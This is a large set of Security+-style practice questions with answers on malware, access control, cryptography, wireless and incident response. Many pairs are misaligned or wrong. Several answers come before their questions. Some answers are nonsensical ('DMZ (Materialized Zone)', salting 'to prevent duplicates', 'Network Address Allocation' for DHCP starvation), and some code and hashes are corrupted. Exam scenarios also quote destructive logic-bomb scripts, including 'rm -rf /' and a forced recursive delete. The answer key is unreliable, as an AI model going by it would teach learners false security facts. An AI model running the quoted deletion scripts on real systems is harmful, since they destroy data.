A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch system. File: winx86_adobe_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 Given the above output, which of the following MOST likely happened?

The file was infected when the patch manager downloaded it

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).

The firewall is disabled on workstations Default administrator credentials exist on networking hardware.

A technician receives a device with the following anomalies : / F requent pop-up ads Show response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267E D2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29C CEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF2888 1F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe , E289F21CD33E4F57890DDEA5CF28E DC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed?

The web application firewall

Which of the following statements is true about symmetric algorithms?

They use a single key to encrypt-decrypt

Matt just became the new security officer for a university. He's concerned that student workers who work late could try to log in with faculty credentials. Which of the following is the most beneficial for preventing these actions?

Time of day restrictions

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

Time of day restrictions

Kevin is going over his company's recertification policy. Which is the best reason to recertify?

To audit permissions

Kevin manages the security for his company and is working to implement a kernel integrity subsystem for key servers. Of the following list, what is the primary benefit of this?

To detect whether files have been altered.

What is the purpose of screen locks on mobile devices?

To limit access to the device

Which of the following is the best reason for salting a password hash before it is stored in a database

To prevent duplicates value for being stored

Of the following, which is the most significant disadvantage of federated identities?

Transitive Trust

An attacker trying to gain access to your network is sending users a link to a free stock-monitoring program. However, that stock-monitoring program is attached to a software that will give an attacker access to any machine it is installed on. What type of attack is this?

Trojan Horse

Walt, a sales manager at your company, has been complaining about his computer performing slowly. When you investigate the issue, you noticed some spyware on his computer, but he insists the only thing he has downloaded lately was a freeware stock trading application. What best explains this situation?

Trojan Horse

Paul is the web security administrator for a website that does online auctions. A few users are complaining that when they log in to the website, they get a message stating it's down to try again later. Paul checks and he can visit the site without any problem, even from outside of the network. He also checks the web server log but there is no entry of these users ever connecting. Of the following, which best explains this situation?

Typosquatting

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody?

Update the evidence log

Charlotte is a network administrator and needs to administer several servers. Her task is to make it easier to administer and secure these servers, as well as make the installation of new servers more streamlined. Which of the following best addresses this issue?

Virtualizing the servers

Which of the following types of attacks occurs when an attacker calls up people over the phone and attempts to trick them into providing their credit card information?

Vishing

Which of the following describes the key difference between vishing and phishing attacks?

Vishing attacks are accomplished using telephony services.

Neil is given the task of creating a wireless network for his company. The wireless network needs to implement a wireless protocol that provides the maximum level of security while providing support for older wireless devices, simultaneously. Which protocol should be used?

WPA (Wi-Fi Protected Access)

Steven is making an outline of plans to implement a wireless network. Which protocol was designed to provide security for a wireless network and is considered to be the most secure from the choices below?

WPA 2

XSS (Cross-site scripting)

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

An active/passive configuration has an impact on:

availability

As part of the new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?

implement containerization of company data

Which is the best choice for naming the account of John Smith - domain admin?

jsmith

A user needs to send senitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key?

non-repudiation Message integrity

A procedure differs from a policy in that it:

provides step-by-step instructions for performing a task.

Gary is concerned about unauthorized people entering the company's building. Of the following, which would be most effective in preventing this

Security Guards

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?

Separation of duties

Your security policy is set to include system testing and security awareness training guidelines. Which of the following types of control is this?

Preventative Administrative Control

In determining when it may be necessary to perform a credentialed scan against a system instead of a non- credentialed scan, which of the following requirements is MOST likely to influence its decisions?

the scanner must be able to audit file systems permissions

Kevin manages security for a large university and has just successfully performed a threat analysis for the network. Based on past incidents and studies from similar setups, he has determined that the most prevalent threat is low-skilled attackers who wish to breach the system, simply because they can, for some low-level crime, or even changing a grade. Which term describes this attacker?

Script Kiddie

An actor downloads and runs a programs program against a corporate login page. The program imports a list of username and password, looking for successful attempt. Which of the following terms best describes the actor in this situation?

Script kiddie

Pat is working to allocate appropriate numbers of IP addresses for various subnets in the network for his company. What would be the proper CIDR notation for an IP v4 subnet with 72 nodes?

/24

A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup-querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX prefer ence=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address= 192.168.102.67 Which of the following should the penetration tester conclude about the command output?

192.168.102.67 is a backup mail server that may be more vulnerable to attack.

Randi is concerned about unauthorized users connecting to company routers and she wants to prevent spoofing. What is the most essential antispoofing technique for routers?

ACL (Access Control List)

Josh manages security at a power plant. The facility is sensitive, and security is very important. He would like to incorporate two-factor authentications with physical security. Which of the options below is the best way to meet this requirement?

A mantrap with a smart card at one door and a pin keypad at the other door.

Agile

A development team has adopted a new approach to projects in which feedback is iterative and multiple iterations of deployments are provided within an application's full life cycle. Which of the following software development methodologies is the development team using?

A security analyst is attempting to break into a client's secure network . The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform :

A gray-box penetration test.

WPS

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented in the administrator does not want to provide the wireless password or he certificate to the employees?

The firewall should be configured to prevent user traffic form matching the implicit deny rule.

A new firewall has been places into service at an organization. However, a configuration has not been entered on the firewall. Employees on the network segment covered by the new firewall report they are unable to access the network. Which of the following steps should be completed to BEST resolve the issue?

The file was embedded with a logic bomb to evade detection.

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output: Given the above outputs, which of the following MOST likely happened?

Continuous monitoring

A security administrator returning from a short vacation receives an account lock-out message when attempting to log into the computer. After getting the account unlocked the security administrator immediately notices a large amount of emails alerts pertaining to several different user accounts being locked out during the past three days. The security administrator uses system logs to determine that the lock-outs were due to a brute force attack on all accounts that has been previously logged into that machine. Which of the following can be implemented to reduce the likelihood of this attack going undetected?

Implement account lockout settings

A security analyst is investigating a suspected security breach and discovers the following in the logs of the potentially compromised server: Which of the following would be the BEST method for preventing this type of suspected attack in the future?

PGP

A system administrator wants to implement an internal communication system that will allow employees to send encrypted messages to each other. The system must also support non- repudiation. Which of the following implements all these requirements?

Service account

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?

Which should be required by a company to mitigate the impact of a custom piece of software being installed by a vendor in case the vendor later goes out of business?

A third party source code escrow

Hardware OTP token

A user is presented with the following items during the new-hire onboarding process: -Laptop -Secure USB drive -Hardware OTP token -External high-capacity HDD -Password complexity policy -Acceptable use policy -HASP key -Cable lock Which of the following is one component of multifactor authentication?

Carolyn is the network administrator for a small financial services company and is responsible for controlling access to the resources on her network. Which technology is responsible for blocking access to a resource based on the requesting IP address?

ACL (Access Control List)

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews..

A. Eliminate shared accounts C. Implement usage auditing and review E. Copy logs in real time to secured WORM drive

Of the following, which is a symmetric encryption algorithm that works with 128/192/256bit key versions?

AES (Advanced Encryption Standard)

Alissa manages the network for her company, a health club chain. She's working to find a communication technology option that uses low power and can spend long periods in sleep modes. What technology would be the best fit?

ANT

Tanner is the network security administrator for his company that creates advanced routers and switches. He has noticed that his networks have been subjected to advanced attacks over a period of time. What term best describes this attack?

APT (Advanced Persistent Threat)

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe?

Acceptance

Matt manages database security for a university and he's concerned about ensuring that appropriate security measures are implemented. Which is the most important to database security?

Access Control Policies

Jakob is worried that someone will use a password cracker on the computers in his company. He's concerned that common passwords will be attempted in order to gain access to a system. Which would be the best option to mitigate the threat?

Account lockout policies

Of the listed principles, which one is the most important in managing account permissions?

Account recertification

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

Accounting

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?

Administrative

Josh is a bank manager and has suspicions that one of his tellers has stolen money from their respective station. After talking with his supervisor, he places the employee on leave with pay, changes their computer account to suspended, and takes their prox card and building keys. Which procedure was followed?

Adverse Actions

A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?

Air gap the desktops.

A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack?

All calls to different DLLs should be hard-coded in the application

Using a similar wireless configuration of a nearby network

An attack that is using interference as its main attack to impede network traffic is which of the following?

Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator?

An attacker could potentially perform a downgrade attack. The IPSec payload reverted to a 16-bit sequence numbers.

You have network users that are able to assign permissions to their own shared resources such as folders and data drives. Which access control model is currently being used?

DAC (Discretionary Access Control)

Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?

Resiliency

Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?

Resiliency

A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?

Disable NTLM

An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?

CASB

Isaac is in need of an authentication protocol that would be effective when it comes to stopping a session hijacking. Which of the following would be the best choice?

CHAP

You've been asked to conduct a penetration test for a small company and for the test, you were only given a company name, the domain name of their website, and the IP address of their gateway router. What describes the type of test?

Black-Box test

What type of attack is based on sending more data to a target than the target can hold?

Buffer Overflow

When a program has variables and does not check the boundary values before inputting the data, what type of attack is this program vulnerable to?

Buffer Overflow

Sheila is the security administrator for a company where most employees use handheld devices such as smartphones and tablets. The employees would like to use the devices for work and home as well. Which of the following is the most secure solution?

COPE

Of the listed principles, which process would transpire if a user provides a correct username and password?

Authentication

Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?

Authentication issues

Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?

Antivirus

Of the listed principles, which is not a physical security control?

Antivirus software

A security analyst observes the following events in the logs of an employee workstation: 1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level. 1/23 1:07:09 1034 The scan is completed. No detections were found. The security analyst reviews the file system and observes the following: C:\>dir C:\Users\user\temp 1/23 1:07:02 oasdfkh.hta 1/23 1:07:02 update.bat 1/23 1:07:02 msg.txt Given the information provided, which of the following MOST likely occurred on the workstation?

Application white listing controls blocked an exploit payload from executing.

A threat actor has created a tool which creates a man-in-the-middle attack. The actor is using this tool to capture encrypted communication between two remote users. The actor was unable to decrypt the messages he captured though. Why was the threat actor unable to decrypt the messages he captured as part of his man-in-the-middle attack?

Asymmetric Encryption

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { car random_user_input[12]; stropy (random_user_input, bar); } Which of the following vulnerabilities is present?

Buffer overflow

Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?

Sandboxing

Which plan identifies critical systems and components to ensure assets are safe and protected?

BCP (Business Continuity Plan)

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?

Banner grabbing

Choose the appropriate attack that sends two different messages using the same hash function, therefore, causing a collision

Birthday

Nicole noticed when she's in a crowded area, she gets a stream of unwanted texts. They end when she leaves the area. What is the attack just described?

Bluejacking

Richard discovered that someone was able to obtain some information from his smartphone using a Bluetooth connection. The attacker was able to get a contact list and some emails. What type of attack is this?

Bluesnarfing

You've noticed when in a crowded area, data from your cell phone is stolen. When performing an investigation, you notice a Bluetooth connection in your phone that is unfamiliar. What describes this attack?

Bluesnarfing

Laura manages the physical security for her company. She's especially concerned about an attacker driving a vehicle into the building. Which option below would protect against this threat?

Bollards

Michael is analyzing strange behavior by some of the computers on his network. He believes the machines contain some malware. The symptoms include strange behavior that continues even if they boot to a Linux Live CD. What is the most probable cause?

Boot Sector Virus

Laura manages DLP for a large company where some employees have COPE and some have BYOD. What DLP issue could these devices present?

COPE (Corporate Owned Personally Enabled) and BYOD (Bring our Own Device) devices can be used as a USB OTG (On The Go) resource

John works on database server security for his company. He is concerned about preventing unauthorized access to the databases. Which of the following is the most appropriate for him to implement?

DAMP (Data Activity Monitoring Prevention)

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?

CRL

Josh is a security technician who's been tasked with implementing PKI on the company's network. When verifying the validity of the certificate, he needs to ensure bandwidth isn't being consumed. What can be implemented?

CRL (Certificate Revocation List)

You currently use a PKI (public key infrastructure) in your company to issue digital certificates to users. Recently, you've had temporary contractors for a project that is now complete, and management has asked that all digital certificates be revoked. Which PKI component should be consulted for the request?

CRL (Certificate Revocation List)

Jason needs to renew the certificate for his company's web server. Which of the following is recommended to be submitted to the CA?

CSR (Certificate Signing Request)

Frank is responsible for network security at a university where faculty members are being issued laptops. Many of the faculty members leave their laptops in their offices most of the time. Frank is concerned about device theft. In this situation, what would be the most cost-effective method to secure the laptops?

Cable Locks

Which of the following locations contain the MOST volatile data?

Cache memory

A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

Certificate utilizing the SAN file

Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?

Competitor

A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: The infrastructure must allow staff to authenticate using the most secure method. The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure?

Configure a captive portal for guest and WPA2 Enterprise for staff.

Amy manages mobile device security for her company, an insurance firm. The company currently uses BYOD. She's concerned about employees' personal device usage compromising company data on the mobile devices. What technology could best assist with this concern?

Containerization

You have identified a malware incident on your company network. Which of the following items should you attempt first?

Containment

You are responsible for security for a defense contracting company and are concerned about users within your network exfiltrating data via sensitive documents to emails. What is the best solution to address this?

Content Filtering

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?

Sandboxing

Buddy is the security manager for a bank and has recently been reading about malware that accesses system memory modules. He would like to find a solution that keeps programs from utilizing system memory. Which of the options would be the best solution?

DEP (Data Execution Prevention)

Which standard shown here uses a single 56-bit symmetric key?

DES

Of the listed encryption algorithms, which one is the weakest?

DES (Data encryption Standard)

Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop?

DLP

Scott works for a large bank that is trying to limit the risk associated with unapproved USB devices to company documents. Which is the best solution for this problem?

DLP (Data Loss Prevention)

Dawn is a network administrator where the company network is segmented into zones of high security, medium security, low security, and the DMZ. She's concerned about external intruders and would like to install a honeypot. Which is the most important zone to put the honeypot in?

DMZ (Demilitarized Zone)

Which of the following device concepts limit access to systems from outside users while protecting those inside the LAN?

DMZ (Demilitarized Zone)

Josh is designing a new network infrastructure that will allow unauthenticated users to connect from the Internet and access certain areas. The goal is to protect everything internal while still providing outside access. Josh decided to put the web server on a separate subnet that's open to public contact. What is this subnet called?

DMZ (Materialized Zone)

Choose the type of attack that is based on entering fake information into a target network domain name server?

DNS Poisoning

You've noticed that users on your network use a specific bank for personal banking. Some users have been the victim of a recent attack, where they visited a fake bank website and their logins were compromised. They had all visited the bank from your network and they insist they typed in the correct URL. What is most likely the explanation for this?

DNS Poisoning

Peter manages network security at a large company and is concerned about the variety of attacks, specifically DNS poisoning. Which of the following would be the best option to mitigate this issue?

DNSSEC

Malia has noticed some steganography tools on an employee's computer. What is the greatest concern regarding an employee having steganography tools?

Data Exfiltration

Name a process of deleting data by sending an eraser to clear the instruction in an address of nonvolatile memory.

Data-at-rest

Nat noticed an attacker is trying to get network passwords by using software that attempts many passwords from a list of common passwords. What type of attack is this?

Dictionary

You're looking to begin accepting electronic orders from a vendor and you want to ensure that people who aren't authorized cannot send orders. Your manager wants a solution that allows the opportunity to provide nonrepudiation. Which of the following would meet the specified requirements?

Digital Signatures

Brady is the network administrator for his company where some users keep getting dropped from the network. When he checks the logs for that specific WAP, he finds that a deauthentication packet has been sent from those IP addresses. What seems to be happening?

Disassociate Attack

Wayne works for a large law firm and manages network security. It's common for guests who come to the law firm to need to connect to the WiFi. He wishes to ensure that he provides maximum security when these guests connect using their own devices, but also seeks to provide assurance to the guests that his company will have minimal impact on their devices. What is the best solution?

Dissolvable NAC Agent

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved? (Select TWO)

DoS attack and Resource exhaustion

You are a network security administrator for a bank and you have noticed that an attacker has exploited a flaw in OpenSSL and forced connections to move to a weak cipher which the attacker can breach. What type of attack is this?

Downgrade attack

Which of the following types of EAP use an operation that consists of three phases?

EAP-FAST

Which of the following requires both server and client certificates?

EAP-TLS

Which cryptography option uses points on a curve to define public and private key pairs?

ECC (Elliptic Curve Cryptography)

In mobile devices, which of the following algorithms is typically used??

ECC (Elliptical Curve Cryptography)

Janet manages the security of the database servers at the mortgage company where she works. The servers are Windows Server 2016; she's concerned about file system security. Which Microsoft feature would be most helpful to implement security to the file systems?

EFS (Encrypting File System)

As a security officer, you are concerned about data loss prevention (DLP). You have limited the use of USBs as well as all other portable media, you use an IDS to look for large volumes of outbound data, and a guard search all bags and people before they leave the building. What is a key step in the DLP that you have missed?

Email

Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?

Embedded web server

A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts?

Employ an account expiration strategy.

Of the following options, what does application management accomplish for mobile devices?

Ensures only approved applications are installed on the devices

Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?

Error handling

Jeremy is concerned about employees violating software licenses. What would be the first step to address this issue?

Establishing clear policies

Jose is responsible for incident response at his company. There has been a breach of the network, recently, which was widespread and affected many computers. As a part of his incident response process, he will be collecting logs from his SIEM, which aggregates logs from 20 servers. Which of the following should be done first?

Event de-duplication

What type of attack uses a second WAP with the same SSID as a legitimate AP in an attempt to get user information via connecting to the hackers WAP?

Evil Twin

Of the following, choose a common security issue that is hard to control in large environments when a user has more rights, permissions, and privileges than the job requires. What is described by this scenario?

Excessive Privileges

Millie is responsible for testing security and uses a tool that identifies vulnerabilities and provides mechanisms to test them by trying to exploit them. What best describes this tool?

Exploit Framework

A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject?

Exploitation of local console access and removal of data

Olivia manages wireless security in her company and wants completely different WiFi access (ie different SSID, different security levels, different authentication methods) in different parts of the company. What's the best choice for Olivia to select in WAPs?

FAT

Laura is currently working for a defense contracting company and is responsible for the security of their mobile devices. The company provides its employees company-issued tablets that may contain sensitive and even classified data. What would be the most important security measure to implement on the tablets to protect the sensitive information on them?

FDE

Steven is a network administrator for an insurance company. His company employs quite a few traveling salespeople. Steven is concerned about confidential data on their laptops. Which method is the best way to address this?

FDE ( Full Disk Encryption)

One of your tasks is being responsible for authentication methods for your company. You've implemented fingerprint scanners in order to gain access to server rooms. People are frequently denied access to the server room even though they are authorized. What problem is presented here?

FRR (False Rate of Rejection)

Tanner has been given permission to run a vulnerability scan on the company's wireless network infrastructure. During the scan, he finds that ports 20 and 21 are open on most of the devices. What protocol is usually assigned to these ports?

FTP

Jack manages security devices in his network. He's implemented a robust NIDS in his network, however, on two occasions the NIDS has missed a breach. What condition does this describe?

False Negative

Andy is running an IDS on his network where sometimes users report that the IDS flags legitimate traffic as an attack. What situation describes this?

False Positivie

When using a NIDS or NIPS in your organization, what are your two biggest concerns?

False positives and false negatives

A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises?

Faraday cage

Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources?

Federation

Joe is concerned about attacks to an e-commerce server. He's especially concerned about a cross-site scripting attack and SQL injection. Which of the following would defend against these two attacks?

Filtering user input

Nicholas is looking for an authentication method that supports one-time passwords and works with the Initiative for Open Authentication. For this, the user will need unlimited time to use their password. Which of the following is the most beneficial?

HOTP (Hased Based - One Time Password)

Lance is the network administrator for a small college that has recently implemented a simple NIDS. However, the NIDS seems to catch only well-known attacks. What technology seems to be missing?

Heuristic scanning

Brandon is a network administrator and has received a popup window that tells him his files are now encrypted and he must pay a certain amount of bitcoins to get them decrypted. He tried to check the files in question, but their extensions have all changed and he cannot open them. What best explains the given scenario?

His machine has ransomware

Jamie recently downloaded a program from an unknown website and now his client files have had their file extensions changed and he cannot open them. He received a popup window that informed him that his files were now encrypted and he must pay some bitcoins to get them decrypted. What has happened?

His machine has ransomware

Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?

Honeypot

Which recovery site is the easiest to test?

Hot Site

Of the following examples, which is an example of a custodian security role?

Human Resources employee

Jody is worried about disgruntled employees stealing company documents and exfiltrating them from the network. She's seeking a solution that will detect exfiltration and block it. What type of system is Jody seeking?

IPS (Intrusion Prevention System)

You have partnered with another company that requires some systems to be shared. Which agreement outlines how they should be interfaced?

ISA

You have been tasked with finding a standard for your company in order to implement consistent information security management systems. You're looking for a standard that is international. Which of the following is the best option?

ISO 27002

Your wireless network has been breached and it seems as though the attacker has modified a portion of your data that is used with a stream cipher. This was used to expose wirelessly-encrypted data. What type of attack is this?

IV Attack

A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the commpany most liekely select?

IaaS

After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take?

Identification

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: The breach is currently indicated on six user PCs One service account is potentially compromised Executive management has been notified In which of the following phases of the IRP is the manager currently working?

Identification

Kevin, the helpdesk manager, calls stating that there has been an increase in calls from users who are stating that their computers are infected with malware. Which of the following steps should be taken first?

Identification

Which of the following is the proper order for logging a user into a system from the first step to the last step?

Identification, authentication, authorization

Mark noticed that one of the employees at his company tethers to his smartphone to bypass corporate web security to access prohibited websites while still being connected to the LAN. What is the best way to prevent this?

Implement a policy against tethering

You currently have web developers in your company who have direct access to production servers and can deploy code to it. These actions can lead to insecure code and code flaws being deployed to directly into the live environment. Currently, your company only has one server available (the production server). What is the best change that can be made to mitigate this risk?

Implement a staging server

Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?

Insiders

Rooting/jailbreaking Sideloading

Joe, an employee, wants to show his colleagues how much he knows about smartphones. Joe demonstrates a free movie application that he installed from a third party on his corporate smartphone. Joe's colleagues were unable to find the application in the app stores. Which of the following allowed Joe to install the application? (Select two.)

You're responsible for network protocols. The network time protocol has been failing periodically. What is the most affected?

Kerberos

A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?

Key logger

Scott is the CISO for a bank. In recent readings, he read about an attack where the attacker was able to enumerate all the network resources and was able to make some resources unavailable. All of this was done by exploiting a single protocol. Which protocol would need to be secured to mitigate this attack?

LDAP (Lightweight Directory Access Protocol)

Frank is concerned about an attacker enumerating his entire network. What protocol could help mitigate this issue?

LDAPS

You're currently facing a common security issue that's very difficult to control in a large environment. It happens when a user has more privileges than that required for the task the user needs to fulfill. This is the opposite of what principle?

Least Privilege

Josh is responsible for creating new accounts for company network use. What is the most important thing to keep in mind for this process?

Least Privileges

Jace manages security at the Ford Company. Lately, he's noticed there have been twenty new employee accounts created and assigned into the default group for the network. He's noticed eight of these have privileges that aren't required for their job task. Which security principle is the best way to avoid this problem in the future?

Least privileges

Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed?

Lessons learned review

Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack?

Lessonslearned

Paula is responsible for setting up a kiosk computer that will stay in the lobby of her company. It should be accessible for visitors to locate employee offices, obtain the guest WiFi password, and collect general public information from the company. What is the most important thing to consider before configuring this system?

Limiting functionality to only what's needed

Which of the following best describes what mobile content management (MCM) on a mobile device is used for?

Limiting the type of content that can be accessed on the device.

A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?

Locality-based

Your company has implemented a clean desk policy and you were asked to secure physical documents every night. What is the best solution?

Locking Cabinets and drawers

JB is a security administrator for a bank and has discovered a piece of software on the database server that is not supposed to be there. It looks as though the software will begin deleting files if a certain employee is terminated. What best describes this process?

Logic Bomb

Which of the following is describing malware that will be executed and begin some malicious activity when a particular condition is met?

Logic Bomb

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select - ExpandProperty name if ($members -notcontains "JohnDoe"){ Remove-Item -path C:\Database -recurse -force } Which of the following did the security administrator discover?

Logic bomb

An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server?

Logic bomb

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Mantrap

Melanie is responsible for security devices at her company. She's currently concerned about detecting intrusions. She would like a solution that works across entire network segments. She also wants to ensure that false positives do not interrupt workflow. What's the best solution to consider?

NIDS (Network Intrusion Detection System)

Which of the following could help detect trespassers in a secure facility?

Motion-detection sensors Security guards

You're responsible for server room security. You're concerned about physical theft of computers. Of the following, which would best be able to detect theft or attempted theft?

Motion-sensor activated cameras

Derrick is a security administrator for a medium-sized mortgage company. He needs to verify that the network is using the most secure login/authentication scheme possible. Which of the following options is the best choice for that?

Multi-factor authentication

Of the following, which is the correct term that is used to describe a virus that can infect both the program files and the boot sectors?

Multipartite

Tina manages security at a medium-sized insurance company. She is concerned with detecting intrusions into the network. Unfortunately, her boss (Jim) doesn't want her to stop any ongoing or attempted intrusions, but instead he just wants her to detect and log them as they occur. Jim also stated that she may only install one intrusion detection or prevention system because he is worried about the cost of installing numerous systems or pieces of software across the network. Tina wants to ensure she still can detect any intrusions that occur within the entire network though. What would best meet the requirements set up by both Tina and Jim?

NIDS (Network Intrusion Detection System)

Which method below was used as a native default for older versions of Microsoft Windows?

NTLM (New Technology Lan Manager)

Lori is concerned about DHCP starvation attacks, especially since learning that anyone can download a software called a "gobbler" and use it to execute a DHCP starvation attack. What technology would help mitigate this risk?

Network Address Allocation

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security backward compatibility when accessing the wireless network?

Open shares VPN and SSL

Matthew is working to select an authentication method for his company that will support REST as well as many web-based and mobile clients. Which of the following would be the best choice?

OpenID Connect

